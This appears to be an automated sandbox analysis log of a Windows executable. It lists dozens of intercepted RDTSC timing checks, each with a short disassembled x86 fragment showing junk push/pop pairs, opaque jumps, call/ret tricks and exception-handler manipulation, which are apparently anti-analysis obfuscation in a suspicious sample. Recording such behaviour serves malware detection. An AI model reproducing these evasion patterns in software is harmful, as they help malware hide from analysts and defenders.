Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 992DFA second address: 992E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D8BE1 second address: 9D8BE5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DABDE second address: 9DABFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE39h 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DABFC second address: 9DAC06 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F7F147AEA4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D9DA5 second address: 9D9E18 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ebx 0x00000007 nop 0x00000008 mov dword ptr [ebp+122D5769h], eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F7F1511CE28h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000014h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f mov bx, AFBAh 0x00000033 xor edi, 09865B4Ch 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov ebx, edi 0x00000042 mov eax, dword ptr [ebp+122D10E5h] 0x00000048 mov bl, A0h 0x0000004a push FFFFFFFFh 0x0000004c mov bx, dx 0x0000004f nop 0x00000050 push ecx 0x00000051 pushad 0x00000052 push ecx 0x00000053 pop ecx 0x00000054 jp 00007F7F1511CE26h 0x0000005a popad 0x0000005b pop ecx 0x0000005c push eax 0x0000005d push eax 0x0000005e push edx 0x0000005f pushad 0x00000060 jnc 00007F7F1511CE26h 0x00000066 jmp 00007F7F1511CE2Ah 0x0000006b popad 0x0000006c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DBC5F second address: 9DBC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DBC65 second address: 9DBC6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DBE25 second address: 9DBE2B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DBE2B second address: 9DBE30 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDB4C second address: 9DDB53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDB53 second address: 9DDBEA instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F7F1511CE2Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7F1511CE39h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ecx 0x00000014 call 00007F7F1511CE28h 0x00000019 pop ecx 0x0000001a mov dword ptr [esp+04h], ecx 0x0000001e add dword ptr [esp+04h], 00000016h 0x00000026 inc ecx 0x00000027 push ecx 0x00000028 ret 0x00000029 pop ecx 0x0000002a ret 0x0000002b jmp 00007F7F1511CE38h 0x00000030 push 00000000h 0x00000032 movsx ebx, ax 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push ebx 0x0000003a call 00007F7F1511CE28h 0x0000003f pop ebx 0x00000040 mov dword ptr [esp+04h], ebx 0x00000044 add dword ptr [esp+04h], 00000016h 0x0000004c inc ebx 0x0000004d push ebx 0x0000004e ret 0x0000004f pop ebx 0x00000050 ret 0x00000051 mov dword ptr [ebp+122D2CE9h], eax 0x00000057 xchg eax, esi 0x00000058 jng 00007F7F1511CE30h 0x0000005e push eax 0x0000005f push edx 0x00000060 push esi 0x00000061 pop esi 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DDD72 second address: 9DDD7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F7F147AEA46h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFC73 second address: 9DFCAC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F7F1511CE34h 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b nop 0x0000000c or di, 8F74h 0x00000011 push 00000000h 0x00000013 mov edi, dword ptr [ebp+122D318Ah] 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jno 00007F7F1511CE2Ch 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DED05 second address: 9DED09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DEDBC second address: 9DEDC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0BBB second address: 9E0BEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA4Ch 0x00000009 popad 0x0000000a jmp 00007F7F147AEA55h 0x0000000f popad 0x00000010 push eax 0x00000011 pushad 0x00000012 jnp 00007F7F147AEA4Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFE78 second address: 9DFE7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFE7C second address: 9DFE89 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9DFE89 second address: 9DFE8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1CEC second address: 9E1CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2C07 second address: 9E2C0B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2C0B second address: 9E2C11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E2C11 second address: 9E2C61 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F7F1511CE33h 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e mov edi, 461FDFE3h 0x00000013 push 00000000h 0x00000015 mov ebx, edi 0x00000017 push 00000000h 0x00000019 push 00000000h 0x0000001b push eax 0x0000001c call 00007F7F1511CE28h 0x00000021 pop eax 0x00000022 mov dword ptr [esp+04h], eax 0x00000026 add dword ptr [esp+04h], 0000001Ch 0x0000002e inc eax 0x0000002f push eax 0x00000030 ret 0x00000031 pop eax 0x00000032 ret 0x00000033 push eax 0x00000034 push eax 0x00000035 push esi 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3E06 second address: 9E3E28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F147AEA54h 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3E28 second address: 9E3E2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E3E2D second address: 9E3E37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4E90 second address: 9E4F00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jbe 00007F7F1511CE26h 0x00000009 jmp 00007F7F1511CE39h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp], eax 0x00000014 xor dword ptr [ebp+122D311Ch], edi 0x0000001a push 00000000h 0x0000001c mov dword ptr [ebp+122D1A81h], ecx 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 push edi 0x00000027 call 00007F7F1511CE28h 0x0000002c pop edi 0x0000002d mov dword ptr [esp+04h], edi 0x00000031 add dword ptr [esp+04h], 00000019h 0x00000039 inc edi 0x0000003a push edi 0x0000003b ret 0x0000003c pop edi 0x0000003d ret 0x0000003e mov edi, dword ptr [ebp+122D2B23h] 0x00000044 and ebx, dword ptr [ebp+122D18FCh] 0x0000004a xchg eax, esi 0x0000004b push eax 0x0000004c push edx 0x0000004d push esi 0x0000004e jo 00007F7F1511CE26h 0x00000054 pop esi 0x00000055 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4F00 second address: 9E4F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F7F147AEA46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E4F0A second address: 9E4F23 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 push ebx 0x00000011 pop ebx 0x00000012 jns 00007F7F1511CE26h 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E1E59 second address: 9E1F22 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007F7F147AEA57h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007F7F147AEA48h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Ah 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b mov edi, eax 0x0000002d push dword ptr fs:[00000000h] 0x00000034 movzx ebx, si 0x00000037 mov dword ptr fs:[00000000h], esp 0x0000003e mov dword ptr [ebp+122D28F6h], ecx 0x00000044 mov eax, dword ptr [ebp+122D00D9h] 0x0000004a push 00000000h 0x0000004c push eax 0x0000004d call 00007F7F147AEA48h 0x00000052 pop eax 0x00000053 mov dword ptr [esp+04h], eax 0x00000057 add dword ptr [esp+04h], 00000019h 0x0000005f inc eax 0x00000060 push eax 0x00000061 ret 0x00000062 pop eax 0x00000063 ret 0x00000064 mov ebx, dword ptr [ebp+122D2AA3h] 0x0000006a push FFFFFFFFh 0x0000006c jmp 00007F7F147AEA4Fh 0x00000071 nop 0x00000072 pushad 0x00000073 jnl 00007F7F147AEA4Ch 0x00000079 jnl 00007F7F147AEA48h 0x0000007f popad 0x00000080 push eax 0x00000081 push ecx 0x00000082 push eax 0x00000083 push edx 0x00000084 jbe 00007F7F147AEA46h 0x0000008a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E0D94 second address: 9E0D98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5C8D second address: 9E5C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5C91 second address: 9E5C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5C95 second address: 9E5CD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007F7F147AEA48h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 mov dword ptr [ebp+122D28EFh], ecx 0x0000002c push 00000000h 0x0000002e sub dword ptr [ebp+122D31C7h], ecx 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push esi 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5CD2 second address: 9E5CD7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5ED6 second address: 9E5EEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E5EEB second address: 9E5EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007F7F1511CE26h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E7DC2 second address: 9E7DC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E7DC6 second address: 9E7E5A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F7F1511CE33h 0x0000000c jmp 00007F7F1511CE2Dh 0x00000011 popad 0x00000012 mov dword ptr [esp], eax 0x00000015 push edx 0x00000016 mov bx, di 0x00000019 pop ebx 0x0000001a push 00000000h 0x0000001c push 00000000h 0x0000001e push edx 0x0000001f call 00007F7F1511CE28h 0x00000024 pop edx 0x00000025 mov dword ptr [esp+04h], edx 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc edx 0x00000032 push edx 0x00000033 ret 0x00000034 pop edx 0x00000035 ret 0x00000036 jl 00007F7F1511CE2Ch 0x0000003c mov dword ptr [ebp+122D35FCh], ebx 0x00000042 push 00000000h 0x00000044 push 00000000h 0x00000046 push eax 0x00000047 call 00007F7F1511CE28h 0x0000004c pop eax 0x0000004d mov dword ptr [esp+04h], eax 0x00000051 add dword ptr [esp+04h], 00000017h 0x00000059 inc eax 0x0000005a push eax 0x0000005b ret 0x0000005c pop eax 0x0000005d ret 0x0000005e mov bh, 25h 0x00000060 mov dword ptr [ebp+122D3124h], edx 0x00000066 xchg eax, esi 0x00000067 pushad 0x00000068 jmp 00007F7F1511CE2Dh 0x0000006d push eax 0x0000006e push edx 0x0000006f ja 00007F7F1511CE26h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E7E5A second address: 9E7E5E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EA351 second address: 9EA356 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E7F8A second address: 9E7F9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F7F147AEA48h 0x0000000f push edi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E8044 second address: 9E804A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9E804A second address: 9E8062 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA54h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9EC9E8 second address: 9EC9EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F0BF1 second address: 9F0BF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F0BF7 second address: 9F0C06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 jg 00007F7F1511CE26h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F0C06 second address: 9F0C1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F058A second address: 9F058E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F058E second address: 9F05AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F7F147AEA54h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F06F4 second address: 9F06F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98722F second address: 987234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F61CE second address: 9F61D8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F1511CE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9F61D8 second address: 9F61DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBD00 second address: 9FBD06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FBD06 second address: 9FBD10 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F7F147AEA46h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FC7F6 second address: 9FC807 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F7F1511CE2Bh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FC807 second address: 9FC80D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9FC80D second address: 9FC813 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06D7A second address: A06D95 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F7F147AEA46h 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F7F147AEA4Bh 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06D95 second address: A06D99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06D99 second address: A06DC4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F7F147AEA46h 0x00000008 jnc 00007F7F147AEA46h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 popad 0x00000018 jmp 00007F7F147AEA53h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06DC4 second address: A06DC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06DC8 second address: A06DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06DD3 second address: A06DD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06DD8 second address: A06DE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA4Bh 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06DE9 second address: A06DED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05ACE second address: A05AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA53h 0x00000007 jng 00007F7F147AEA46h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05C68 second address: A05C87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F7F1511CE2Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jbe 00007F7F1511CE26h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05C87 second address: A05C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05C8D second address: A05C91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05C91 second address: A05C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05C95 second address: A05CA3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06087 second address: A0608B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A0608B second address: A0608F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06202 second address: A0620E instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F7F147AEA46h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A05797 second address: A057E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F7F1511CE31h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c jnp 00007F7F1511CE32h 0x00000012 jmp 00007F7F1511CE2Ch 0x00000017 pop edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b js 00007F7F1511CE26h 0x00000021 pushad 0x00000022 popad 0x00000023 jmp 00007F7F1511CE31h 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A057E1 second address: A057F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F7F147AEA4Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A057F3 second address: A057F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9D1F2D second address: 9D1F35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06620 second address: A06635 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push ebx 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06A8B second address: A06AA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F147AEA4Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 push esi 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: A06AA0 second address: A06AB2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7F1511CE2Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
